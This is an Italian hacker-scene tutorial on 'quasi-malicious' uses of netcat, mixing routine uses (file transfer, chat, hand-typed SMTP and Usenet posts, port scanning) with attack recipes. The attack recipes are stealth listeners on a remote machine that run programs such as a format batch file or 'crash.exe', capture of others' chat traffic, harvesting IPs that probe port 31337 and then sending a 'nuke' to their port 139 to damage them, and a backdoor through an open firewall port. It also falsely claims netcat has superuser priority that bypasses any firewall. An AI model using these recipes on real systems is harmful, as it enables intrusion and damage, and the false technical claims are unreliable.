 Procedure quasi-maliziose con netcat ad uso e abuso degli aspiranti
 spippolatori.

 By Master the Original.

   	ogni procedura puo' essere provata direttamente sul
        proprio computer utilizzandolo contemporaneamente come
        client e come server.
        e' sufficiente aprire due form dos ed eseguire all'interno
        le procedure relative.
        L'ip a cui collegarsi in modalita' client ovviamente sara' 
                  
                    127.0.0.1  = (localhost)
        
        se durante l'esecuzione dei comandi il dial-up cerca di 
        stabilire una connessione : premere annulla nel form
        relativo .. se ci si collega al nostro computer siamo
        gia' collegati anche senza il dial no!? ;-)


     lista delle opzioni di netcat utilizzate

     ( nc -h per avere l'help)

	-d              modo stealth, rende TSR e invisibile netcat
	-e prog.exe     esegue il programma prog.exe
	-i secs         delay, tempo di ritardo in secondi
	-l              modo 'in ascolto' esecuzione unica
	-L              modo 'in ascolto' esecuzione ciclica
	-n              dichiara che gli IP sono in formato numerico
	-o file         salva file relativo al traffico su una porta
	-p port         porta numero <port>
	-s addr         indirizzo IP a cui collegarsi
	-t              emula i protocolli di scambio di TELNET
	-u              abilita il protocollo UPD
	-v              'verbose' stampa a schermo tutto quello che fa'
	-vv             'very verbose' come sopra ma piu' approfondito
	-w secs         timeout. Dopo <Secs> si disabilita e/o esegue
	-z              modo zero-I/O. Usato nello scanning delle porte.


    NETCAT NELLA PRATICA OPERATIVA

  
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

 NETCAT FUNZIONANTE COME TSR

  l'opzione -d (stealth) aggiunta come parametro permette il
  funzionamento di netcat in modo invisibile (nessun form del
  dos viene aperto)
  Questo puo' essere usato sopratutto nella gestione di netcat
  sul computer remoto per non dar la possibilita' di vedere
  l'esecuzione dei comandi.
  Questa opzione non funziona su tutte le macchine, dipende dalle
  locazioni chiamate dalle word tsr init  DS:WR, DS:ES che variano
  a seconda delle versioni di w95 e NT.
  Sulle macchine (poche) dove l'opzione crea errore per rendere stealth
  netcat bisogna compilare un prog in c o in basic che trovi 
  l'handler del form dos aperto e lo sposti tramite la API
  MoveWindow in una locazione del desktop non visibile.

  es: 

  KEYLOG DEL CLIENT SUL COMPUTER SERVER
   
   (utile per scrivere un file passo passo sul remoto)  
   
    SERVER
    nc -d -l -p <porta> > c:\windows\sorpresa.txt

    CLIENT
    nc <Indirizzo IP del remoto> <porta>

        scrivendo del testo e terminando la digitazione
        con CTRL C sul server verra' scritto alla locazione
        designata tutto cio' che e' stato digitato con 
        l'analoga formattazione.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SPEDIZIONE DI UN FILE AD UN COMPUTER REMOTO

COMPUTER CHE RICEVE

  		nc -l -p <porta> -v -t -w 3 > prova.txt

                le opzioni -v -t non servono all'atto pratico
                sono solo per fare le verifiche.
                -L (elle maiuscola) al posto di -l se si vuole che
                dopo la ricezione netcat si riesegua automaticamente
                con le stesse opzioni. (Esecuzione ciclica)

COMPUTER CHE INVIA

                nc <indirizzo IP> <porta> < filedainviare.txt


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
CHAT ANONIMA PERSONALE CON UN ALTRO UTENTE

  si aprono due form DOS

  PERSONA 1:
  nc -l -p <porta1> -v                       (ascolta e vede sulla porta 1)
  nc <indirizzo IP di persona 2> <porta2>    (manda i caratteri sulla porta 2)

  PERSONA 2:
  nc -l -p <porta2> -v                       (ascolata e vede sulla porta 2)
  nc <indirizzo IP di persona 1> <porta1>    (manda i caratteri sulla porta 1)

  


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ESECUZIONE DI UN PROGRAMMA SU UN COMPUTER REMOTO

  COMPUTER REMOTO:
  nc -l -p <porta> -e c:\dir1\dir2\..\formatta.bat
  
  -L (elle maiuscola) al posto di -l se si vuole che
  dopo la ricezione netcat si riesegua automaticamente
  con le stesse opzioni. (Esecuzione ciclica)
  (ovviamente il file formatta.bat va fatto e spedito
   prima!)

  ALTRO COMPUTER:
  nc <indirizzo IP del remoto> <porta>


  
 1.  OGNI PROCEDURA PUO' ESSERE ESEGUITA SU PROTOCOLLO UPD
     AGGIUNGENDO -u alle opzioni

 2.  E' possibile (richiamo precedente) usare l'opzione stealth
     per rendere invisibile l'attesa di chiamata da parte di netcat
     sul computer remoto: le opzioni in questo caso cambiano in

     COMPUTER REMOTO     
     nc -d -L -p <porta> -e c:\dir1\dir2\..\programma.exe

  
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ESECUZIONE DI UNO SCRIPT SU TELNET

   ES: SPEDIZIONE DI UNA MAIL SU SMTP

   File posta.txt 
           inizio ---------------------------------------
                  MAIL FROM : Master <csf0137@polaris.it>
                  RCPT TO   : qualcuno@qualcuno.qu
                  DATA
                  Ciao ciao.
                  ti mando questa mail tramite netcat!
                  .
             fine ---------------------------------------

   nc <indirizzo IP dell'SMTP> 25 < posta.txt

   ES: SPEDIZIONE DI ARTICOLO SU ALT.HACKERS

   File articolo.txt
	   inizio ----------------------------------------
                  group alt.hackers
                  listgroup alt.hackers 
                  post
                  From: Master <csf0137@polaris.it>
                  Newsgroups: alt.hacker
                  Subject: Post con netcat
                  Approved: approvato!
                  X-Newsreader: NETCAT PROFESSIONAL ;-)
                  
                  questo articolino viene spedito
                  tramite netcat.
                  .
             fine ----------------------------------------
                 
   nc <indirizzo IP del news server> 119 < articolo.txt

 

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 VERIFICA DELLE INTROMISSIONI SU UNA PORTA
 CON VISIONE DELL'IP DI COLLEGAMENTO E CARATTERI
 RICEVUTI
 
    ES: PING DA PARTE DI UTENTI BACKORIFICE!

   	
   nc -l -v -u -p 31337

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

 CATALOGO DEGLI USER CHE PINGANO SULLA 31337 UPD


   nc -l -v -u -p 31337 >> catalogo.txt

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

 VERIFICA E SPEDIZIONE DI TESTO IN CASO DI PING (a altro)
  
   nc -l -v -u -p 31337 > trovaip.cmd
   nc -n -s <ip trovato> -p 139 < nuke.txt
            
            ci vuole un piccolo script in c per passare
            l'IP dal file trovaip.cmd a <ip trovato>
           (usare per danneggiare il sistema caratteri
            preceduti dal carattere ^ = CTRL ... ^Z=invio)

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

  NETCAT >>> E' <<< UGUALE A TELNET

  invece di  TELENT indirizzo porta
  
  basta dire  NC indirizzo porta

  con la differenza che mentre telnet usa esclusivamente il
  protocollo TCP netcat spedisce e riceve anche su UPD settando
  il parametro -u.


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 SUPERSNIFFER
 -SALVA UN FILE CONTENENTE IL TRAFFICO ASCII PASSANTE PER UNA PORTA

 es. collegandosi alla porta chat di uno che conversa in ICQ
     si registra tutto quello che invia. ;-)

   SUL PROPRIO COMPUTER

       nc -l -p <porta> -o c:\dir\..\leggotutto.txt

           poi per fare la prova ci si puo collegare su un altro
           form dos con 
           nc 127.0.0.1 <porta> 
           e provare a digitare qualcosa seguito da CTRL C per
           leggere poi il traffico ASCI nel file leggotutto.txt
           dovrebbe essere un qualcosa del tipo
           file leggotutto.txt ---------------------------------
             < 00000000 61 73 64 95 61 73 64 0a       # asd.asd.
             < 00000008 61 73 64 0a                   # asd.
             < 0000000c 73 73 0a                      # ss.
             < 0000000f 73 0a                         # s.
             < 00000011 73 0a                         # s.
             < 00000013 0a                            # .
             < 00000014 73 0a                         # s. 
             < 00000016 73 64 61 61 73 64 0a          # sdaasd.
            fine -----------------------------------------------
           
   SUL COMPUTER REMOTO

       nc -l -p <porta> -s <nome host remoto> -o c:\dir\..\leggo.txt

       oppure se si conosce l'ip in forma numerica

       nc -l -p <porta> -n -s <indirizzo IP> -o c:\dir\..\leggo.txt

       si legge il traffico ascii sulla porta <porta> del computer 
       remoto e ovviamente viene registrato il tutto sul proprio
       computer nel file leggo.txt      

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 SNIFFER - SCANNER

 TROVARE UNA PORTA APERTA SUL COMPUTER REMOTO

   nc <indirizzo IP> <port1>-<port2> -v

      es:   nc 123.456.789.012 1000-2000 -v 

            [ con porta1-porta2 si dichiara un 
              range di porte da scannerare    ] 
              
            nc va alla ricerca di una porta rispondente dalla 1000
            alla 2000 sul computer remoto. E' MOLTO LENTO!!!
            per abbreviare i tempi a scapito della precisone
            si puo' usare l'opzione -z

            nc 123.456.789.012 1000-2000 -v -z

  per fare la prova si apre in un form dos nc con le seguenti opzioni

      nc -l -v -p 1234   ( apre la porta 1234 e si mette in ascolto)

  in un altro form dos si esegue

      nc 127.0.0.1 1230-1240 

      dopo un po' nc stampera' le informazioni trovate relativamente
      alla porta aperta.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

  PRIORITA' (questo c'e' anche sulla guida!)

  Netcat si assegna di default una priorita' di connessione di livello
  admin superuser percui l'esecuzione dei comandi e delle varie opzioni
  viene eseguita al di sopra di ogni altro protocollo.

  
  es: eseguendo un comando parallelamente ad una sessione netbios o
      anche sotto firewall si oltrepassa la priorita' di queti ultimi
      permettendo l'aggiramento di ogni tipo di protezione.

    es. netbios

    nc -v -l -p 139 -n -s <indirizzo IP sorgente> > leggo.txt
    legge i dati sulla porta 139 di un macchina in remoto
    collegandosi all'IP sorgente.
    Se il remoto effettua delle transazioni su quest'ultima
    netcat mette il netbios in attesa e finisce prima il proprio
    lavoro (spesso macchine NT vanno in crash.)

    .. si potra' anche inviare sulla 139 dei dati? mah! ;-)))
    
    es. firewall 
    
    di solito i firewall permettono la lettura sulle porte
    53 e/o 59 e/o 20 .. questo almeno per l'invio dei dati
    relativi alle dichiarazioni di 'avvertimento'.. questo basta!
 
    sulla macchina sotto firewall volendo ad esempio far partire
    il programma crash.exe in diverse riprese si installa 
    netcat nel seguente modo:

    nc -d -L -p <porta del firewall aperta> -e c:\dir\..\crash.exe

    sulla propria invece

    nc -v <ip della macchina firewallata> -p <porta del firewall aperta>
            
      (-v e' giusto per vedere che cosa dice!)

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 
   ... il resto e il meglio alla prossima puntata!!! ha ha ha.

